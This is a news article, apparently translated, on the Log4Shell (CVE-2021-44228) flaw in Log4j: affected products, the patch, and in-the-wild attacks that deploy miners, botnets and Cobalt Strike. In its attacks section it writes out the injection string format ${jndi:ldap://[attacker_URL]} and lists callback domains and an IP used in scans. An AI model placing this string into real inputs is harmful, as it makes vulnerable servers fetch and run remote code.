Cybercriminals and cybersecurity researchers are already scanning the network for products vulnerable to a dangerous bug in the Log4j library, which has been named Log4Shell . The vulnerability is already being exploited to deploy miners, Cobalt Strike beacons, and so on.
Log4Shell
An issue in the popular Log4j logging library included in the Apache Logging Project was reported last week. The 0-day vulnerability received the identifier CVE-2021-44228 and scored 10 out of 10 points on the CVSS vulnerability rating scale, as it allows remote arbitrary code execution (RCE). The problem is aggravated by the fact that PoC exploits have already appeared on the network, and the vulnerability can be exploited remotely, and this does not require special technical skills.
The vulnerability forces Java-based applications and servers that use the Log4j library to log a specific line to their internal systems. When an application or server processes such logs, a string can cause the vulnerable system to load and run a malicious script from the attacker’s controlled domain. The result will be a complete hijacking of the vulnerable application or server.
The problem was originally discovered while searching for bugs on Minecraft servers, but the Log4j library is present in almost all corporate applications and Java servers. For example, it can be found in almost all enterprise products released by the Apache Software Foundation, including Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Flink, Apache Kafka, Apache Dubbo, and so on. Log4j is also actively used in various open source projects, including Redis, ElasticSearch, Elastic Logstash, Ghidra and others.
Thus, companies using any of these products are also indirectly vulnerable to attacks on Log4Shell, but may even know about it. As recently as last week, information security specialists reported that solutions of such giants as Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase and probably thousands of other companies may be vulnerable to Log4Shell. Even worse, attackers immediately began scanning the network for targets to attack.
Let me remind you that the patch has already been released as part of the 2.15.0 release .
Attacks
The attacks on Log4Shell have already begun, Bleeping Computer now reports . The publication says that to exploit the bug, an attacker can simply change the user agent of his browser and visit a specific site or search for a string on the site using the format ${jndi:ldap://[attacker_URL]}.
This will eventually add a line to the web server’s access logs, and when the Log4j application parses these logs and finds the line, the error will force the server to execute a callback or request to the URL specified in the JNDI line. Attackers can then use this URL to send commands to the vulnerable device (either Base64 encoded or Java classes).
Worse, simply pushing a connection can be used to determine whether a remote server is vulnerable to Log4Shell.
It is reported that attackers are already using Log4Shell to execute shell scripts that download and install various miners. In particular, the hackers behind the Kinsing malware and the botnet of the same name actively abuse the Log4j bug and use Base64 payloads that force the vulnerable server to download and execute shell scripts. The script removes the competing malware from the vulnerable device, and then downloads and installs the Kinsing malware, which will start mining the cryptocurrency.
In turn, Chinese experts from Netlab 360 warn that the vulnerability is being used to install malware Mirai and Muhstik on vulnerable devices. These IoT threats make vulnerable devices part of botnets, use them to extract cryptocurrency and conduct large-scale DDoS attacks.
“We received the first responses from our Anglerfish and Apacket honeypots, which recorded two waves of attacks using the Log4j vulnerability to form botnets. A quick analysis of the sample showed that they were used to form the Muhstik and Mirai botnets, that is, in both cases they were aimed at Linux devices, ”the experts say.
According to Microsoft analysts, a vulnerability in Log4j is also used to drop Cobalt Strike beacons. Initially, Cobalt Strike is a legitimate commercial tool created for pentesters and red teams and is focused on exploitation and post-exploitation. Unfortunately, it has long been loved by hackers, from government APT groups to ransomware operators.
Although it is not available to ordinary users and the full version is priced at about $ 3,500 per install, attackers still find ways to use it (for example, relying on old, pirated, jailbroken and unregistered versions).
So far, there is no evidence to guarantee that the ransomware has adopted an exploit for Log4j, but according to experts, the deployment of Cobalt Strike beacons clearly indicates that such attacks are inevitable.
Also, in addition to using Log4Shell to install various malware, cybercriminals use the problem to scan vulnerable servers and obtain information from them. For example, the exploit shown below can force vulnerable servers to access URLs or perform DNS lookups for callback domains. This allows information security specialists and hackers to determine if a server is vulnerable and use it for future attacks, research, or try to get a bug bounty from its owners.
Journalists fear that some researchers may go too far by using an exploit to steal environment variables that contain server data, including the hostname, username under which the Log4j service runs, OS information, and OS version number.
The most common domains and IP addresses used for these scans are:
• interactsh.com
• burpcollaborator.net
• dnslog.cn
• bin $ {upper: a} ryedge.io
• leakix.net
• bingsearchlib.com
• 205.185.115.217:47324
• bingsearchlib.com:39356
• canarytokens.com
Of particular interest here is the bingsearchlib.com domain, which is used for callback exploits. The fact is that an unnamed cybersecurity researcher told Bleeping Computer that although the domain was used as a callback for exploits, bingsearchlib.com was not registered. As a result, the expert registered the domain to prevent abuse, but does not register requests.
GreyNoise reports that IP addresses using the bingsearchlib.com callback also frequently use callbacks from 205.185.115.217:47324.
Bleeping Computer researchers themselves found numerous requests from the psc4fuel.com domain trying to exploit the publication’s website. Apparently, the domain is posing as the legitimate psc4fuel.com, owned by an oil company. This domain is used to submit Java classes, but it was not possible to get a sample of the classes, that is, it is not yet clear whether the attacker or the hacker is behind the attacks.
